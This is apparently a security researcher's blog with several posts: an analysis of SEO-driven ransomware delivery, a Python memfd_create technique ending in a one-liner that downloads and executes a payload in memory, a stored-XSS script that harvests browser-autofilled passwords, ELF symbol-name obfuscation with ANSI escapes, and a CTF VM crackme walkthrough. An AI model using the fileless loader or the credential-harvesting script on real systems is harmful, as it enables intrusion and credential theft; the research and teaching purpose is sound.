Le journal d'un reverser

vendredi 29 mai 2020

When ransomware does SEO

Last night I was called by a friend. Usual story, someone he knows has been cryptolocked, that's tragic, usual tears and screams, yadda yadda.

When this particular story gets interesting is how the victim got infected. Usually, ransomware are deployed through mail attachment. This one was not really delivered to the victim, it was more the victim itself that fetch the ransomware. How does it possible?

We'll see, it'a tragedy in 3 steps.

I choose to write this blogpost because of this unusual delivery mechanism: using SEO to trick people into getting fake documents infected with malware is a funny move.

### Step 1, when an innocent website gets infected

At first, the pirate infect a website. In our precise case, its a french restaurant www.--REDACTED--.net. At first glance, nothing is suspect. The pirate adds a lot of pages in the blog section, with targeted contents, and "modèle" (model):

modèle nez rhinoplaste
modèle lettre de réclamation freebox
modèle pestel d'une entreprise
...

All of those pages include a javascript link: "http://www.--REDACTED--.net/?aca30b6=223500"

The first tricky part is here: You can download the js file, it's empty. So, how's thing working? It's because the infected webiste checks your referer. If you have a google referer, the js document gets really interesting:

Technically speaking:

$ curl http://www.--REDACTED--.net/?aca30b6=223500

(nothing, empty page)

gives you an empty result, but:

$ curl --referer "google/?q=recherche.de.mandat" http://www.-REDACTED--.net/?aca30b6=223500

(data is fetched..)

The javascript file is this one:

function remove(elem) 
{ if (!elem) return; 
elem.parentNode.removeChild(elem);
 } 
if (!document.all) document.all = document.getElementsByTagName("*");

for (i = 0; i < document.all.length; i++) {
 if (document.all[i].tagName == "BODY" || document.all[i].tagName == "HTML") { } 
else { remove(document.all[i]);} 
} 
document.body.innerHTML = '<html><head><title>exemple de mandat gestion de projet</title>(and all HTML code of page goes here)...

And we go to the step 2. This javascript wipe all HTML tag, and rewrite all the page. The page title is precisely the query search made by the victim.

The beauty of tracking the google referer is that the legitimate owner will never see a problem: you don't browse your own site from google search... The google referer hack is not something new, but still really efficient.

## Step 2 : a so innocent forum

Look now at this beautiful site, this is not a restaurant anymore, this look like a forum. Nice user Fluffy asks for the exact same model searched (once again, the google query), and Admin answer with a link to the doc. Fluffy says thanks, soooo legit.

If you look now for the victim side, nothing is suspected:

you search for a model of something
you click on a google link
you land on a forum with a link to the doc searched
--> I dare anybody to don't click to the link at this point!

This is why this attack is so effective. Pirates doesn't send mail attachment, they do SEO and wait to victim to fall in trap. (Sort of waterholing attack?)

And you guessed it! This is not a document. This is a zip, containing a .js file which download the final part of the puzzle. The name of the .js file? Exactly the name of the searched terms.

The .js file is obfuscated:

but you can recreate the real payload quite easily (no crypto, just the payload encoded twice):

## Step 3 : the final stage of the attack

This is the last script:

Now, the victim will download the last stage of the attack. As you can see, the victim generates a random number

Ua88 = Math.random().toString()["substr"](2,70+30);

and the consequent download will be checked against this key. The lbhdqisaoetysdwz= variable name change for each download. There are other checks to bypass to get the final payload, but it's always the same things, timers, HTTP header checks, and so on.

## Conclusion

This blogpost has been written because I've never seen this kind of infection before. The legitimate user search for something, and the pirates paved all the way for him to get lost...

A quick google search with choosen term shows that we have more blog infected with those models in a lot of blogs:

Another one:

Because when you know where to look, you find a lot of those sites. And for the fun fact, all commas are changed to backticks for an unknown reason (maybe because the pirate doesn't know how to escape commas 😃 ).

And as usual, the VirusTotal shame for the js file

One last note for the user: He did some backups, and its antivirus killed the ransomware around after the tenth file encrypted. That's all for today, and be safe.

mercredi 20 février 2019

Executing payload without touching the filesystem (memfd_create syscall)

Sometime, you gain code execution on a target and you want to leverage it to a full metasploit payload (or any other relevant binary). If you have access to filesystem, you can copy payload and launch it. But defenders can use the noexec flag to disk, and sometime you just can't have the rights to write files. Wouldn't it be nice to have a download_and_exec_in_memory(payload) ?

0/ Intro

Since kernel 3.17 you can use memfd_create syscall. As the name says it, you can create a file descriptor in memory. If you're an attacker, you can use this nice syscall to execute binarys without touching any file in the filesystem! (excepting /proc).

This is not something new, you can read documentation here:

1/ A bit of syscall and python

At first, we read the syscall number, and args:

mitsurugi@dojo:~/blog$ grep memfd_create /usr/include/x86_64-linux-gnu/asm/unistd_64.h
#define __NR_memfd_create 319
mitsurugi@dojo:~/blog$ cat /usr/include/linux/memfd.h
#ifndef _LINUX_MEMFD_H
#define _LINUX_MEMFD_H
/* flags for memfd_create(2) (unsigned int) */
#define MFD_CLOEXEC  0x0001U
#define MFD_ALLOW_SEALING 0x0002U

#endif /* _LINUX_MEMFD_H */
mitsurugi@dojo:~/blog$

The MFD_CLOEXEC is interesting (close fd when executed).

python can't call syscall directly. Fortunately we have ctypes and a libc, so in order to create the memfd, we can just do this:

#! /usr/bin/python3

import ctypes
import ctypes.util
import time

libc = ctypes.cdll.LoadLibrary(ctypes.util.find_library('c'))
fd = libc.syscall(319,b'Mitsurugi', 1)
assert fd >= 0
time.sleep(60)  #sleep is just here to let us list /proc file

And we can see that we have a new fd in our process:

mitsurugi@dojo:~/blog$ ps ax | grep memfd
 6237 pts/5    S+     0:00 /usr/bin/python3 ./memfd1.py
mitsurugi@dojo:~/blog$ ls -l /proc/6237/fd
total 0
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 0 -> /dev/pts/5
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 1 -> /dev/pts/5
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 2 -> /dev/pts/5
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 3 -> /memfd:Mitsurugi (deleted)
mitsurugi@dojo:~/blog$

the "(deleted)" string appears here, just don't pay attention to it.

2/ Ready to play!

The next part is super easy. Just copy bytes to the FD, and execv() it. For the clarity of the program, I just copy the /usr/bin/xeyes binary to the memfd.

#! /usr/bin/python3

import ctypes
import ctypes.util
import os

libc = ctypes.cdll.LoadLibrary(ctypes.util.find_library('c'))
fd = libc.syscall(319,b'Mitsurugi', 1)
assert fd >= 0

with open('/usr/bin/xeyes', mode='rb') as f1:
    with open('/proc/self/fd/'+str(fd), mode='wb') as f2:
        f2.write(f1.read())

os.execv('/proc/self/fd/'+str(fd), [""])

And it works flawlessly. We could download the payload from anywhere in the internet instead of copying the file, closing the control terminal with setsid(), use dup2() to bind /dev/null for fd 0,1,2 and so on... (this is left as an exercise to the reader ;) ).

3/ From defender point of view

3/1/ block with noexec doesn't work

My first though was to use the noexec for the /proc directory. Unfortunetaly, it doesn't help, all examples in the blogpost have been tested and verified with noexec:

mitsurugi@dojo:~/blog$ mount | grep ^proc
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
mitsurugi@dojo:~/blog$

3/2/ Detecting bad behavior

If we look closely we can see things:

mitsurugi@dojo:~/blog$ ps ax | grep 6601
 6601 pts/6    S      0:00
 6604 pts/6    S+     0:00 grep 6601
mitsurugi@dojo:~/blog$

The process have no name at all (!). In some situation this could be seen as an advantage. If you are concerned, just use prctl() to rename your process.

With the help of lsof we can find some unusual thing:

mitsurugi@dojo:~/blog$ lsof | grep txt | grep 6601
3     6601     mitsurugi  txt    REG    0,5   28744    224284 /memfd:Mitsurugi (deleted)
mitsurugi@dojo:~/blog$

3/3/ recovering the file

But, can we recover the binary bytes from fd? Remember that we use the MFD_CLOEXEC flag. The file descriptor is closed:

mitsurugi@dojo:~/blog$ cat /proc/6601/fd/3 > output
cat: /proc/6601/fd/3: No such device or address
mitsurugi@dojo:~/blog$

So, no tracks at all? Could it be the perfect backdoor? Not so fast, you can always cat the /proc/<pid>/exe to get code back:

mitsurugi@dojo:~/blog$ cat /proc/6601/exe | md5sum
443bdd422a4437e319d3b86330990c45  -
mitsurugi@dojo:~/blog$ cat /usr/bin/xeyes | md5sum
443bdd422a4437e319d3b86330990c45  -
mitsurugi@dojo:~/blog$

You can still copy an encrypted code in the fd and launch it with the key as argument, but someone could always dump the process memory and read bytes back. If code runs in the target machine, an analyst could get it.

4/ Conclusion

Here is a fun way to launch process without touching the file system and bypassing the noexec flag.
I give the one-liner, you just have to host the payload, and it work:

python3 -c 'import ctypes,ctypes.util,os,requests; libc = ctypes.cdll.LoadLibrary(ctypes.util.find_library("c"));fd = libc.syscall(319,b"Mitsurugi", 1);f2=open("/proc/self/fd/"+str(fd),"wb");f2.write(requests.get("http://127.0.0.1:8000/payload").content);f2.close();os.execv("/proc/self/fd/"+str(fd), [""])'

mercredi 20 juin 2018

Credential stealing with XSS without user interaction

0/ Intro

XSS are everywhere, on a lot of websites. It has been called the most underrated security vulnerability.

On one hand, you can pop up an alert('PWNED') but it's not really worth to fear an alert() in your browser.

On the other hand, people tend to store Login/Password in the browser. You log on to intranet.corp and Firefox asks to save password. You click yes.

After a chat with @XeR, we figured that we can combine both to silently steal your credential with a simple XSS, without user interaction.

1/ Show me the code, or die()!

Our login form for intranet.corp:

<HTML>
  <BODY>
    <form>
        <input type="text" name="user" />
        <input type="password" name="pass" />
        <input type="submit" />
    </form>
  </BODY>
  <!-- This is propa codaz -->
</HTML>

Log once, store password in browser:

The browser has saved the password. If you return to the login.html page, the user and pass are filled.

2/ Attack

Let say we have a stored XSS in website. Innocent user surf to this page. This page include evil javascript:

var form = document.createElement("form");
var text = document.createElement("input");
var pass = document.createElement("input");

text.id   = "login";
text.name = "login";
text.type = "text";

pass.id   = "password";
pass.name = "password";
pass.type = "password";

form.appendChild(text);
form.appendChild(pass);

window.addEventListener("load", function() {
 console.log("evil loader");
 window.setTimeout(function() {
  alert(text.value + ":" + pass.value);
 }, 1000);
});

And "voilà". Javascript here add a form, Firefox autocomplete the values, then our little js read the values and alert() them to screen (possibilities are endless here).

Attacker can now login to intranet.corp. Note that user doesn't need to be tricked to enter information in a fake form, or phished. The js code will nicely ask the browser to give him the login/pass.

3/ Best parts

You don't have any user interaction with this attack. The user doesn't have to put log and pass in a form, it just have to trigger the XSS[1] .
This hasn't anything to do with cookies, so HTTPS or http_only won't help. We want the pass, we have the pass.
Moar fun, the user doesn't need to be logged in! If XSS is triggered, boom, credz are for attacker.
If you find a stored XSS on a site with many users, you'll raise your luck to get credz, just wait.

99/ Outro

Be nice with others, and in case you wonder, I don't use the password manager of my browser.
Thanks for @XeR for the chat which lead to this.

8 times down. 9 times up!

0xMitsurugi

[1] Finding the XSS is an exercise left to the reader

mardi 20 février 2018

Fun with function names. Where resolving goes wild.

Last night, I was looking through C-code and ARM assembly.
I was wondering myself: When a binary calls a function inside a shared lib, how the linker knows where the code resides in the library?
The second question was: can we change the name of functions in a binary and in a library and that everything works after?
And third: can we use some fancy characters in function names? Like changing color of the xterm when doing an objdump or gdb the binary? You know ANSI escape codes? What if we put ANSI escape code in function name?

1/ Start smoothly

My computer is currently a raspberry pi. Everything here has been tested under this architecture. It should work everywhere, but your mileage may vary.

Let's take an example:

mitsurugi@raspi:~/resolv_func/$ cat libpoem.h
int this_is_an_external_func_in_a_lib();
mitsurugi@raspi:~/resolv_func/$ cat libpoem.c
/* Compile with gcc -shared -o libpoem.so libpoem.c */
#include <stdio.h>

int this_is_an_external_func_in_a_lib() {
 puts("ARM disassembly");          //5
 puts("Reading symbol resolving"); //7
 puts("In the cold of night");     //5
 return 42;
}
mitsurugi@raspi:~/resolv_func/$ cat proj.c
/* gcc -o proj -Wl,-rpath=. -L. -I. -l poem proj.c */
#include "libpoem.h"

int main() {
 int ret;
 ret=this_is_an_external_func_in_a_lib();
 return ret;
}
mitsurugi@raspi:~/resolv_func/$

We can compile and run this binary:

mitsurugi@raspi:~/resolv_func/blog$ gcc -shared -o libpoem.so libpoem.c
mitsurugi@raspi:~/resolv_func/blog$ gcc -o proj -Wl,-rpath=. -L. -I. -l poem proj.c
mitsurugi@raspi:~/resolv_func/blog$ ldd proj
 linux-vdso.so.1 (0x7efd9000)
 libpoem.so => ./libpoem.so (0x76f33000)
 libc.so.6 => /lib/arm-linux-gnueabihf/libc.so.6 (0x76e30000)
 /lib/ld-linux-armhf.so.3 (0x76f57000)
mitsurugi@raspi:~/resolv_func/blog$ ./proj 
ARM disassembly
Reading symbol resolving
In the cold of night
mitsurugi@raspi:~/resolv_func/blog$

The dynamic linker search for the lib in the current path (which is not really secure, but out of the scope of this blogpost).

This binary runs fine, as expected.

2/ Symbol resolution

The question is, how does the binary knows where to look for the this_is_an_external_func_in_a_lib() call? It's obviously related to string comparison:

mitsurugi@raspi:~/resolv_func/blog$ strings proj libpoem.so | grep external
this_is_an_external_func_in_a_lib
this_is_an_external_func_in_a_lib
this_is_an_external_func_in_a_lib
this_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

Well, if we have the string this_is_an_external_func_in_a_lib in the binary and the library, maybe because they are associated?

Proof: if you alter one of these strings, the program doesn't work anymore:

mitsurugi@raspi:~/resolv_func/blog$ sed s/this_is_an_external_func_in_a_lib/AAAA_is_an_external_func_in_a_lib/g proj > proj2
mitsurugi@raspi:~/resolv_func/blog$ chmod +x proj2
mitsurugi@raspi:~/resolv_func/blog$ ldd proj2
 linux-vdso.so.1 (0x7ed45000)
 libpoem.so => ./libpoem.so (0x76eed000)
 libc.so.6 => /lib/arm-linux-gnueabihf/libc.so.6 (0x76dea000)
 /lib/ld-linux-armhf.so.3 (0x76f11000)
mitsurugi@raspi:~/resolv_func/blog$ ./proj2
./proj2: symbol lookup error: ./proj2: undefined symbol: AAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

The same happens if you change the function in the library:

mitsurugi@raspi:~/resolv_func/blog$ mv libpoem.so libpoem.so.ori
mitsurugi@raspi:~/resolv_func/blog$ sed s/this_is_an_external_func_in_a_lib/AAAA_is_an_external_func_in_a_lib/g libpoem.so.ori > libpoem.so
mitsurugi@raspi:~/resolv_func/blog$ chmod +x libpoem.so
mitsurugi@raspi:~/resolv_func/blog$ ldd proj                //this is the unaltered binary
 linux-vdso.so.1 (0x7ea81000)
 libpoem.so => ./libpoem.so (0x76ede000)
 libc.so.6 => /lib/arm-linux-gnueabihf/libc.so.6 (0x76ddb000)
 /lib/ld-linux-armhf.so.3 (0x76f02000)
mitsurugi@raspi:~/resolv_func/blog$ ./proj 
./proj: symbol lookup error: ./proj: undefined symbol: this_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

Seems logic. it search a function by its name.

But wait, what if we change names in BOTH? Would it work? Binary calls for AAAA_is_an_external_func_in_a_lib(), linker will step through all library linked, find libpoem.so, open it, read functions names, fint it and call it. Does it works?

mitsurugi@raspi:~/resolv_func/blog$ ./proj2 
./proj2: symbol lookup error: ./proj2: undefined symbol: AAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

Still a fail, although we have the same name in library and binary:

mitsurugi@raspi:~/resolv_func/blog$ strings proj2 libpoem.so | grep external_func
AAAA_is_an_external_func_in_a_lib
AAAA_is_an_external_func_in_a_lib
AAAA_is_an_external_func_in_a_lib
AAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

3/ Read The Freaky Manual (If it exists...)

When you search something, you can read the manual. But in that case, it won't help because there is no manual.
When you google for symbol resolution, you'll end up with a lot of blog post talking about PLT/GOT stuff. Very interesting (yes, read them, it's very valuable), but there is still magic in those blogposts. (In french: https://www.segmentationfault.fr/linux/role-plt-got-ld-so/ ).

And how those blog posts explains how resolution is made?

In the previous blogspot, it just says: "it's a long and complicated code, but in the end, you get the address". I don't like magic in computing.

4/ No magic. Just show me.

Here are the main links which could help you:

I'll try to summarize things. First, we have a hash section in ELF files:

mitsurugi@raspi:~/resolv_func/blog$ readelf -x .gnu.hash libpoem.so

Hex dump of section '.gnu.hash':
  0x00000118 03000000 08000000 02000000 06000000 ................
  0x00000128 890020b1 00c44289 08000000 0c000000 .. ...B.........
  0x00000138 0f000000 00af34e8 4245d5ec dea1eacc ......4.BE......
  0x00000148 bbe3927c beda571b d871581c b98df10e ...|..W..qX.....
  0x00000158 76543c94 ead3ef0e 59ef9779          vT<.....Y..y

mitsurugi@raspi:~/resolv_func/blog$

This sections contains a header, bloom filters, and hashes. Libc developers wants to run binary fast. When you solve symbols, you have to step through each symbols and make a strcmp. This is slow. Developers add lots of improvements.

I wrote a parser of .gnu.hash sections (values are displayed both in little and big endian):

mitsurugi@raspi:~/resolv_func/blog$ ./hashparse.py libpoem.so
*** Get GNU HASH section for libpoem.so
[+] Ok, one line. Good
[+] GNU HASH mapping fits perfectly disk and memory layout
    starting at 0x00000118
    and size is 0x00004c long
*** Extracting .gnu.hash
*** Parsing...
[+] Header
3 hash buckets              //we'll use this number later
8 symndx
2 bloom masks
6 bloomshift (minimum 6)
[+] Part 2 - bloom masks
 Mask 0 : 0xb1200089L  | 0x890020b1L
 Mask 1 : 0x8942c400L  | 0xc44289
[+] Part 3 - N Buckets of hash
 Bucket 0 : 0x8  | 0x8000000
 Bucket 1 : 0xc  | 0xc000000
 Bucket 2 : 0xf  | 0xf000000
[+] Part 4 - Hashes
 Hash 0 : 0xe834af00L  | 0xaf34e8
 Hash 1 : 0xecd54542L  | 0x4245d5ec
 Hash 2 : 0xcceaa1deL  | 0xdea1eaccL      //pay attention to this hash
 Hash 3 : 0x7c92e3bb  | 0xbbe3927cL
 Hash 4 : 0x1b57dabe  | 0xbeda571bL
 Hash 5 : 0x1c5871d8  | 0xd871581cL
 Hash 6 : 0xef18db9  | 0xb98df10eL
 Hash 7 : 0x943c5476L  | 0x76543c94
 Hash 8 : 0xeefd3ea  | 0xead3ef0eL
 Hash 9 : 0x7997ef59  | 0x59ef9779
mitsurugi@raspi:~/resolv_func/blog$

4/1/ First speedup: Hash table.

For quickly find object in a list, use hashtable. Hashtable are a convenient way to sort and find items in a list. The hash function used in the resolver is the djbx33a one:

static uint_fast32_t
dl_new_hash (const char *s)
{
  uint_fast32_t h = 5381;
  for (unsigned char c = *s; c != '\0'; c = *++s)
    h = h * 33 + c;
  return h & 0xffffffff;
}

We can calculate easily the hash of our function:

mitsurugi@raspi:~/resolv_func/blog$ ./dl_new_hash.py this_is_an_external_func_in_a_lib
[+] Calculating hash for this_is_an_external_func_in_a_lib
Output is 0xCCEAA1DF
mitsurugi@raspi:~/resolv_func/blog$

We can find our hash in the .gnu.hash section: 0xcceaa1de (minus the lower bit, but it's nonsignificant when solver compares hashes, although I spent too much time on this detail).

So, if you change the name of the function and its associated hash, it should work? No, not so easily. This is an hash table, you have to get the same bucket. Long story short, your (new_hash % nbuckets) should be equal to (old_hash % nbuckets). nbuckets equals 3 in this library. Let's work with this number:

this_is_an_external_func_in_a_lib : hash(func)%3 = 0xCCEAA1DF%3 = 0
AAAA_is_an_external_func_in_a_lib : hash(func)%3 = 0xEEA9C6CB%3 = 1 -> Not the same bucket, won't work
BAAA_is_an_external_func_in_a_lib : hash(func)%3 = 0xFFE18ACC%3 = 0 -> Good.

So, we change name of the functions, and change hash with 0xFFE18ACC. Will it work? Still not, one last change to do.

4/2/ Second speedup added: Bloom filter

Using hashes is a big speedup, but libc maintenairs adds another big boost: bloom filter. The goal of this is to quickly reject unknown symbols. This bloom filter is made of another hash, and is used as a fast rejection process. If bloom filter fails, the symbol is not in the file. If bloom filter pass, it maybe or maybe not in the file. Apparently, this causes a huge speedup in symbol resolution. That's clever, but I have to change my fnction name.

If you want to bypass this bloom filter, you can recalculate it. Or you can put all bits to 1 which means: always pass. I'm not a programmer, I want things to work the way I want. So let put all bits to 1, and don't try to recalculate anything.

And after the bloom filter change, it will works, because the linker will say:

does it pass the bloom filter? Yes
does it have an hash? Yes
-n the hash bucket, does a function with the same name exists? Yes
--> Symbol resolution is done, code is here, work your way.

4/3/ First win:

We have to change function name: Easy, we use BAAA_is_an_external_func_in_a_lib
We have to break bloom filter: Easy, put all bits to 1
We have to change hash value: Easy, just take care of the bucket.

After an hexediting (All bytes have been changed by hand):

mitsurugi@raspi:~/resolv_func/blog$ readelf -x .gnu.hash libpoem.so

Hex dump of section '.gnu.hash':
  0x00000118 03000000 08000000 02000000 06000000 ................
  0x00000128 ffffffff ffffffff 08000000 0c000000 ................
  0x00000138 0f000000 00af34e8 4245d5ec cc8ae1ff ......4.BE......
  0x00000148 bbe3927c beda571b d871581c b98df10e ...|..W..qX.....
  0x00000158 76543c94 ead3ef0e 59ef9779          vT<.....Y..y

mitsurugi@raspi:~/resolv_func/blog$

Look bloom filter (all bits are 1), and hash change.
And now, it works like a charm!

mitsurugi@raspi:~/resolv_func/blog$ ./proj2
ARM disassembly
Reading symbol resolving
In the cold of night
mitsurugi@raspi:~/resolv_func/blog$ gdb -q proj2 
Reading symbols from proj2...(no debugging symbols found)...done.
gdb$ disass main
Dump of assembler code for function main:
   0x000006ac <+0>: push {r7, lr}
   0x000006ae <+2>: sub sp, #8
   0x000006b0 <+4>: add r7, sp, #0
   0x000006b2 <+6>: blx 0x584 <BAAA_is_an_external_func_in_a_lib@plt>
   0x000006b6 <+10>: str r0, [r7, #4]
   0x000006b8 <+12>: ldr r3, [r7, #4]
   0x000006ba <+14>: mov r0, r3
   0x000006bc <+16>: adds r7, #8
   0x000006be <+18>: mov sp, r7
   0x000006c0 <+20>: pop {r7, pc}
End of assembler dump.
gdb$

As you can see, I'm calling the function BAAA_is_an_external_func_in_a_lib(), and it works.

mitsurugi@raspi:~/resolv_func/blog$ strings proj2 libpoem.so | grep BAAA
BAAA_is_an_external_func_in_a_lib
BAAA_is_an_external_func_in_a_lib
BAAA_is_an_external_func_in_a_lib
BAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

We know how to change a function name inside a binary and its lib without breaking anything!

5/ Now the fun part!

Ok, let's write a quick python patcher, called, patch.py
You can use anything in the range \x01-\xff for function name. Changing a character in a function is not fun. We can be good boyz (or girlz) and use internationalization. Write UTF-8, and be happy with it. But do you know that your xterm interprets escape sequence? \e]34; will print everything in black. Let write black on black and confuse reversers.

5/1/ Fun with ANSI escape code

we can use a function containing ansi escape code. Ansi escape code can be used to send BEEP, blink characters, change xterm name, change colors, and so on. Here is the fun part, where we change the xterm title when printing the function:

Little known fact: An evil binary can rename your xterm while begin debugged. Blogpost incoming.
Hours of fun: disassembly printed black on black, different functions with same name, and so on. pic.twitter.com/xVTV1ojuWS
— Mitsurugi Heishiro (@0xmitsurugi) 16 février 2018

Fun, but can we do better? Ansi escape code can go backward.
So, we can overwrite function name:

Reading symbols from crack...(no debugging symbols found)...done.
(gdb) disass main
Dump of assembler code for function main:
   0x00000688 <+0>: push {r7, lr}
   0x0000068a <+2>: add r7, sp, #0
   0x0000068c <+4>: blx 0x53c <calling@plt>
   0x00000690 <+8>: movs r3, #0
   0x00000692 <+10>: mov r0, r3
   0x00000694 <+12>: pop {r7, pc}
End of assembler dump.
(gdb) q
mitsurugi@raspi:~/resolv_func/blog$

and, the library says:

mitsurugi@raspi:~/resolv_func/blog$ nm libcrack.so | grep ' T '
000004fc T calling
0000050a T calling
00000518 T calling
00000528 T _fini
000003fc T _init
mitsurugi@raspi:~/resolv_func/blog$

Three functions with the same name?!?! Which one is the good one? You can spend a lot of time in this crackme with static analysis only.

Those fuctions are different. Their name is A\x1b[1Dcalling, B\x1b[1Dcalling and C\x1b[1Dcalling. The \x1b[1D is the sequence backward of 1 char, so it overwrites the first char.

5/2/ Fun with IDA

You can play with IDA. IDA doesn't recognize characters and replace them with _. How in the world would you debug a binary
calling functions ____() and ____() and ____() which are different?
I think there is a lot of improvements here, I'll try to make another blogpost with funny sequences.

6/ The End

I think this blogpost is waaaaay too long, so I'll finish it here. Code will be posted to github, it's just a python script which patch address in binary.

Today not possible. Tomorrow possible.
0xMitsurugi

mardi 30 janvier 2018

Solving a CTF chall the [academic|hardest] way (FIC2018)

My previous articles on solving a crackme has gained some attention, so I'm doing the next one (and the last, I promise). This time, I'll explain how to solve a crackme based on a VM. There is a lot more of asm than previous solutions :-)

This is a more academic blogpost where I'll try to explain how to understand the logic behind the VM and the crackme.

1/ A bit of technic first.

Basically, when you implement a VM, you have to create a virtual CPU. This virtual CPU will have its own registers, memory, CPU flags. This virtual CPU will fetch, decode and execute instructions. Instructions are sequence of bits (for simplification, imagine a byte), and instructions can take 0 to N arguments.

if in pseudo code we want to make 13 xor 37, we can imagine this sequence instructions:

PUT 13 in register (say, R1)
PUT 37 in another register (say, R2)
XOR R1 with R2

this is just encoding after it. If PUT is encoding with a 0x42, register by their numbers, and XOR is encoded as a 0xff, the logical sequence will be:

0x42 0x13 0x1
0x42 0x37 0x2
0xff 0x1 0x2

Easy. That's just conventions. The program is: 0x421301423702ff0102

And the CPU will work with this . Instruction pointer is at offset 0x00.

Fetch: 0x42
Decode: that's a push. It takes 2 arguments: value, then register. Increase instruction pointer by 3..
Execute: moving value at (instruction pointer +1) to register (instruction pointer +2).

Fetch 0x42
and so on..

So if you want to break a VM, you have to learn where the instruction pointer is, where the registers are stored, and how to decode assembly. You have to figure out that 0x42 is a push in the previous example. How? That's the difficulty.

Now, back on our crackme. This is a VM. So, we have the program which emulate a CPU. So, we have to find a big loop: the fetch-decode-execute loop. Once found, you'll know where the instruction pointer is, and where are the instructions.

Next, you'll have to understand the instructions. Once done, this is even more easy: understand program logic, break it, solve the chall, gain points.

2/ Find where things takes place

take time to read the assembly, and follow the dots 1,2,3..

mitsurugi@dojo:~/chall/FIC2018/v24$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb$ disass main
Dump of assembler code for function main:
   0x0000000000400530 <+0>: push   %rbx
   0x0000000000400531 <+1>: mov    $0x1000,%edi
   0x0000000000400536 <+6>: callq  0x400510 <malloc@plt>
   0x000000000040053b <+11>: or     $0xffffffff,%edx
   0x000000000040053e <+14>: test   %rax,%rax
   0x0000000000400541 <+17>: mov    %rax,0x2023d0(%rip)        # 0x602918 <stack>
   0x0000000000400548 <+24>: je     0x40059a <main+106>

//Here is a big loop. The fetch-decode-execute one, probably.
//We read something at 0x602914 (regs+20)
1.   0x000000000040054a <+26>: movslq 0x2023c3(%rip),%rax        # 0x602914 <regs+20>
     0x0000000000400551 <+33>: cmpb   $0xee,0x601440(%rax)       //if equals to 0xee goto end
     0x0000000000400558 <+40>: je     0x40058c <main+92>
3.   0x000000000040055a <+42>: mov    $0x602800,%ebx             //ebx will get increments from 0x10 to 0x10
     0x000000000040055f <+47>: mov    (%rbx),%edx                
     0x0000000000400561 <+49>: movslq 0x2023ac(%rip),%rax        # 0x602914 <regs+20>
     0x0000000000400568 <+56>: test   %edx,%edx  
     0x000000000040056a <+58>: je     0x400582 <main+82>         
4.   0x000000000040056c <+60>: movzbl 0x601440(%rax),%eax        //we fetch the byte @0x601440+rax
     0x0000000000400573 <+67>: cmp    %edx,%eax                  //if eax==edx we call something. That's decode part.
     0x0000000000400575 <+69>: jne    0x40057c <main+76>
     0x0000000000400577 <+71>: xor    %eax,%eax
5.   0x0000000000400579 <+73>: callq  *0x8(%rbx)                 //the call. Probably the execute part.
     0x000000000040057c <+76>: add    $0x10,%rbx
     0x0000000000400580 <+80>: jmp    0x40055f <main+47>         
     0x0000000000400582 <+82>: inc    %eax                       
//The regs+20 gets increased one by one -> so we step in the VM code probably.
2.   0x0000000000400584 <+84>: mov    %eax,0x20238a(%rip)        # 0x602914 <regs+20> 
     0x000000000040058a <+90>: jmp    0x40054a <main+26>

//from here, this is the end of the program
   0x000000000040058c <+92>: mov    0x202385(%rip),%rdi        # 0x602918 <stack>
   0x0000000000400593 <+99>: callq  0x4004c0 <free@plt>
   0x0000000000400598 <+104>: xor    %edx,%edx
   0x000000000040059a <+106>: mov    %edx,%eax
   0x000000000040059c <+108>: pop    %rbx
   0x000000000040059d <+109>: retq   
End of assembler dump.
gdb$

We almost understand how this VM works.

The instruction pointer is at regs+20 (0x602914), we fetch the instruction at 0x601440+the value in regs+20.
The byte is read, then compared to something on 0x602800, 0x602810, 0x602820 and so on. We say this is the decode part.
Then, the callq rbx+0x8 is the execute part.

Fetch, decode, execute.

We know how the virtual CPU works. Lets dive into details. First, what do we have around the instruction pointer:

gdb$ x/16wx 0x601440
0x601440 <g_data>: 0x00000000 0x00000000 0x00000000 0x00000000
0x601450 <g_data+16>: 0x00000000 0x00000000 0x00000000 0x00000000
0x601460 <g_data+32>: 0x00000000 0x00000000 0x00000000 0x00000000
0x601470 <g_data+48>: 0x00000000 0x00000000 0x00000000 0x00000000
gdb$

We have a lot of 00 (a NOP maybe?). What next?

gdb$ x/160wx 0x601440
0x601440 <g_data>: 0x00000000 0x00000000 0x00000000 0x00000000
 (snip ... snip ...snip)
0x601570 <g_data+304>: 0x00000000 0x0001e155 0x0c0d0300 0x0000e255
0x601580 <g_data+320>: 0x0cf20000 0x0000bb33 0xddf20000 0xcc1300bb
0x601590 <g_data+336>: 0x000000bb 0xbbdd0100 0xbbcc3700 0x00000000
0x6015a0 <g_data+352>: 0x00bbdd01 0x00bbccd3 0x01000000 0x3d00bbdd
0x6015b0 <g_data+368>: 0x0000bbcc 0xdd010000 0xccc000bb 0x000000bb
0x6015c0 <g_data+384>: 0xbbdd0100 0xbbccde00 0x00000000 0x00bbdd01
0x6015d0 <g_data+400>: 0x00bbccab 0x01000000 0xad00bbdd 0x0000bbcc
0x6015e0 <g_data+416>: 0xdd010000 0xcc1d00bb 0x000000bb 0xbbdd0100
0x6015f0 <g_data+432>: 0xbbccea00 0x00000000 0x00bbdd01 0x00bbcc13
0x601600 <g_data+448>: 0x01000000 0x3700bbdd 0x0000bbcc 0xaa010000
0x601610 <g_data+464>: 0x000000bb 0xbb33f200 0x00000001 0x02bbaa7a
0x601620 <g_data+480>: 0xf3000000 0x0003bb33 0x66600000 0x990100ab
0x601630 <g_data+496>: 0x020000bb 0x02ab66f9 0x00bb9903 0xaaf90200
0x601640 <g_data+512>: 0x000000bb 0xbb33f400 0x00000001 0x02bbaab2
0x601650 <g_data+528>: 0xf5000000 0x0003bb33 0x664e0000 0x990100ab
0x601660 <g_data+544>: 0x020000bb 0x02ab66f9 0x00bb9903 0xaaf90200
0x601670 <g_data+560>: 0x000000bb 0xbb33f600 0x00000001 0x02bbaab4
